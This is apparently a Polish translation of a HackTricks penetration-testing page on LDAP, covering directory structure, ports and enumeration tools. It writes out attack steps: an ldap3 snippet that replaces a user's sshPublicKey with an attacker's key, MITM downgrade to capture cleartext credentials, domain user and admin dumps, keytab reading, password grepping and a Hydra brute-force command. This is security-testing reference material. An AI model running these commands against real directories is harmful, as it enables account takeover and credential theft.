Użycie LDAP (Lightweight Directory Access Protocol) ma na celu głównie lokalizowanie różnych podmiotów, takich jak organizacje, osoby i zasoby, takie jak pliki i urządzenia w sieciach, zarówno publicznych, jak i prywatnych. Oferuje uproszczone podejście w porównaniu do swojego poprzednika, DAP, dzięki mniejszemu rozmiarowi kodu.
Katalogi LDAP są zorganizowane w sposób umożliwiający ich dystrybucję na kilku serwerach, z których każdy przechowuje replikowaną i zsynchronizowaną wersję katalogu, nazywaną Agentem Systemu Katalogowego (DSA). Odpowiedzialność za obsługę żądań spoczywa całkowicie na serwerze LDAP, który może komunikować się z innymi DSA w razie potrzeby, aby dostarczyć jednolitą odpowiedź do wnioskodawcy.
Organizacja katalogu LDAP przypomina hierarchię drzewiastą, zaczynając od katalogu głównego na górze. Rozgałęzia się to na kraje, które dzielą się dalej na organizacje, a następnie na jednostki organizacyjne reprezentujące różne działy lub departamenty, aż w końcu osiąga poziom poszczególnych podmiotów, w tym ludzi i wspólnych zasobów, takich jak pliki i drukarki.
Domyślny port: 389 i 636(ldaps). Globalny Katalog (LDAP w ActiveDirectory) jest dostępny domyślnie na portach 3268 i 3269 dla LDAPS.
PORT STATE SERVICE REASON
389/tcp open ldap syn-ack
636/tcp open tcpwrapped
LDAP Data Interchange Format
LDIF (LDAP Data Interchange Format) definiuje zawartość katalogu jako zestaw rekordów. Może również reprezentować żądania aktualizacji (Dodaj, Zmień, Usuń, Zmień nazwę).
Linie 5-8 definiują pierwszy poziom domeny moneycorp (moneycorp.local)
Linie 10-16 definiują 2 jednostki organizacyjne: dev i sales
Linie 18-26 tworzą obiekt domeny i przypisują atrybuty z wartościami
Write data
Zauważ, że jeśli możesz modyfikować wartości, możesz być w stanie wykonać naprawdę interesujące akcje. Na przykład, wyobraź sobie, że możesz zmienić informację "sshPublicKey" swojego użytkownika lub dowolnego użytkownika. Jest bardzo prawdopodobne, że jeśli ten atrybut istnieje, to ssh odczytuje klucze publiczne z LDAP. Jeśli możesz zmodyfikować klucz publiczny użytkownika, będziesz mógł zalogować się jako ten użytkownik, nawet jeśli uwierzytelnianie hasłem nie jest włączone w ssh.
# Example from https://www.n00py.io/2020/02/exploiting-ldap-server-null-bind/>>> importldap3>>> server=ldap3.Server('x.x.x.x',port=636,use_ssl=True)>>> connection=ldap3.Connection(server,'uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN','PASSWORD',auto_bind=True)>>> connection.bind()True>>> connection.extend.standard.who_am_i()u'dn:uid=USER,ou=USERS,dc=DOMAIN,dc=DOMAIN'>>> connection.modify('uid=USER,ou=USERS,dc=DOMAINM=,dc=DOMAIN',{'sshPublicKey': [(ldap3.MODIFY_REPLACE, ['ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDHRMu2et/B5bUyHkSANn2um9/qtmgUTEYmV9cyK1buvrS+K2gEKiZF5pQGjXrT71aNi5VxQS7f+s3uCPzwUzlI2rJWFncueM1AJYaC00senG61PoOjpqlz/EUYUfj6EUVkkfGB3AUL8z9zd2Nnv1kKDBsVz91o/P2GQGaBX9PwlSTiR8OGLHkp2Gqq468QiYZ5txrHf/l356r3dy/oNgZs7OWMTx2Rr5ARoeW5fwgleGPy6CqDN8qxIWntqiL1Oo4ulbts8OxIU9cVsqDsJzPMVPlRgDQesnpdt4cErnZ+Ut5ArMjYXR2igRHLK7atZH/qE717oXoiII3UIvFln2Ivvd8BRCvgpo+98PwN8wwxqV7AWo0hrE6dqRI7NC4yYRMvf7H8MuZQD5yPh2cZIEwhpk7NaHW0YAmR/WpRl4LbT+o884MpvFxIdkN1y1z+35haavzF/TnQ5N898RcKwll7mrvkbnGrknn+IT/v3US19fPJWzl1/pTqmAnkPThJW/k= badguy@evil'])]})
Sniff clear text credentials
Jeśli LDAP jest używany bez SSL, możesz przechwycić dane logowania w postaci niezaszyfrowanej w sieci.
Możesz również przeprowadzić atak MITM w sieci pomiędzy serwerem LDAP a klientem. Tutaj możesz przeprowadzić atak downgrade, aby klient używał danych logowania w postaci niezaszyfrowanej do logowania.
Jeśli SSL jest używane, możesz spróbować przeprowadzić MITM jak wspomniano powyżej, oferując fałszywy certyfikat; jeśli użytkownik go zaakceptuje, możesz obniżyć metodę uwierzytelniania i ponownie zobaczyć dane logowania.
Anonymous Access
Bypass TLS SNI check
Zgodnie z tym artykułem wystarczyło uzyskać dostęp do serwera LDAP za pomocą dowolnej nazwy domeny (takiej jak company.com), aby móc skontaktować się z usługą LDAP i wyodrębnić informacje jako anonimowy użytkownik:
LDAP anonymous binds pozwalają nieautoryzowanym atakującym na uzyskanie informacji z domeny, takich jak pełna lista użytkowników, grup, komputerów, atrybutów kont użytkowników oraz polityki haseł domeny. Jest to stara konfiguracja, a od Windows Server 2003 tylko uwierzytelnieni użytkownicy mogą inicjować żądania LDAP.
Jednakże, administratorzy mogli potrzebować skonfigurować określoną aplikację, aby umożliwić anonimowe połączenia i przyznać więcej dostępu niż zamierzano, co dało nieautoryzowanym użytkownikom dostęp do wszystkich obiektów w AD.
Valid Credentials
Jeśli masz ważne dane logowania do serwera LDAP, możesz zrzucić wszystkie informacje o Administratorze Domeny, używając:
Jeśli odpowiedź to True, jak w poprzednim przykładzie, możesz uzyskać pewne interesujące dane z serwera LDAP (takie jak kontekst nazewniczy lub nazwa domeny) z:
Windapsearch to skrypt w Pythonie przydatny do enumeracji użytkowników, grup i komputerów z domeny Windows za pomocą zapytań LDAP.
# Get computerspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--computers# Get groupspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--groups# Get userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Domain Adminspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--da# Get Privileged Userspython3windapsearch.py--dc-ip10.10.10.10-ujohn@domain.local-ppassword--privileged-users
ldapsearch
Sprawdź puste poświadczenia lub czy twoje poświadczenia są ważne:
# CREDENTIALS NOT VALID RESPONSEsearch:2result:1Operationserrortext:000004DC:LdapErr:DSID-0C090A4C,comment:Inordertoperformthisoperationasuccessfulbindmustbecompletedontheconnection.,data0,v3839
Jeśli znajdziesz coś mówiącego, że "bind musi być zakończony", oznacza to, że dane uwierzytelniające są nieprawidłowe.
Aby sprawdzić, czy masz dostęp do jakiegokolwiek hasła, możesz użyć grep po wykonaniu jednego z zapytań:
<ldapsearchcmd...>|grep-i-A2-B2"userpas"
Proszę zauważyć, że hasła, które możesz tutaj znaleźć, mogą nie być prawdziwe...
pbis
Możesz pobrać pbis stąd: https://github.com/BeyondTrust/pbis-open/ i zazwyczaj jest instalowany w /opt/pbis.
Pbis pozwala na łatwe uzyskanie podstawowych informacji:
#Read keytab file./klist-k/etc/krb5.keytab#Get known domains info./get-status./lsaget-status#Get basic metrics./get-metrics./lsaget-metrics#Get users./enum-users./lsaenum-users#Get groups./enum-groups./lsaenum-groups#Get all kind of objects./enum-objects./lsaenum-objects#Get groups of a user./list-groups-for-user<username>./lsalist-groups-for-user<username>#Get groups of each user./enum-users|grep"Name:"|sed-e"s,\\\,\\\\\\\,g"|awk'{print $2}'|whilereadname; do./list-groups-for-user"$name"; echo-e"========================\n"; done#Get users of a group./enum-members--by-name"domain admins"./lsaenum-members--by-name"domain admins"#Get users of each group./enum-groups|grep"Name:"|sed-e"s,\\\,\\\\\\\,g"|awk'{print $2}'|whilereadname; doecho"$name"; ./enum-members--by-name"$name"; echo-e"========================\n"; done#Get description of each user./adtool-asearch-user--nameCN="*"--keytab=/etc/krb5.keytab-n<Username>|grep"CN"|whilereadline; doecho"$line";./adtool--keytab=/etc/krb5.keytab-n<username>-alookup-object--dn="$line"--attr"description";echo"======================"done
Godap to interaktywne terminalowe interfejs użytkownika dla LDAP, które można wykorzystać do interakcji z obiektami i atrybutami w AD i innych serwerach LDAP. Jest dostępne dla Windows, Linux i MacOS i obsługuje proste połączenia, pass-the-hash, pass-the-ticket i pass-the-cert, a także kilka innych specjalistycznych funkcji, takich jak wyszukiwanie/tworzenie/zmiiana/usuwanie obiektów, dodawanie/usuwanie użytkowników z grup, zmiana haseł, edytowanie uprawnień obiektów (DACL), modyfikowanie zintegrowanego DNS Active Directory (ADIDNS), eksportowanie do plików JSON itp.
Ldapx to elastyczny proxy LDAP, które można wykorzystać do inspekcji i transformacji ruchu LDAP z innych narzędzi. Może być używane do obfuskacji ruchu LDAP w celu próby ominięcia narzędzi ochrony tożsamości i monitorowania LDAP oraz implementuje większość metod przedstawionych w prezentacji MaLDAPtive.
Możesz podać johnowi hash hasła (od '{SSHA}' do 'structural' bez dodawania 'structural').
Pliki konfiguracyjne
Ogólne
containers.ldif
ldap.cfg
ldap.conf
ldap.xml
ldap-config.xml
ldap-realm.xml
slapd.conf
IBM SecureWay V3 server
V3.sas.oc
Microsoft Active Directory server
msadClassesAttrs.ldif
Netscape Directory Server 4
nsslapd.sas_at.conf
nsslapd.sas_oc.conf
OpenLDAP directory server
slapd.sas_at.conf
slapd.sas_oc.conf
Sun ONE Directory Server 5.1
75sas.ldif
HackTricks Automatyczne Komendy
Protocol_Name: LDAP #Protocol Abbreviation if there is one.
Port_Number: 389,636 #Comma separated if there is more than one.
Protocol_Description: Lightweight Directory Access Protocol #Protocol Abbreviation Spelled out
Entry_1:
Name: Notes
Description: Notes for LDAP
Note: |
The use of LDAP (Lightweight Directory Access Protocol) is mainly for locating various entities such as organizations, individuals, and resources like files and devices within networks, both public and private. It offers a streamlined approach compared to its predecessor, DAP, by having a smaller code footprint.
https://book.hacktricks.xyz/pentesting/pentesting-ldap
Entry_2:
Name: Banner Grab
Description: Grab LDAP Banner
Command: nmap -p 389 --script ldap-search -Pn {IP}
Entry_3:
Name: LdapSearch
Description: Base LdapSearch
Command: ldapsearch -H ldap://{IP} -x
Entry_4:
Name: LdapSearch Naming Context Dump
Description: Attempt to get LDAP Naming Context
Command: ldapsearch -H ldap://{IP} -x -s base namingcontexts
Entry_5:
Name: LdapSearch Big Dump
Description: Need Naming Context to do big dump
Command: ldapsearch -H ldap://{IP} -x -b "{Naming_Context}"
Entry_6:
Name: Hydra Brute Force
Description: Need User
Command: hydra -l {Username} -P {Big_Passwordlist} {IP} ldap2 -V -f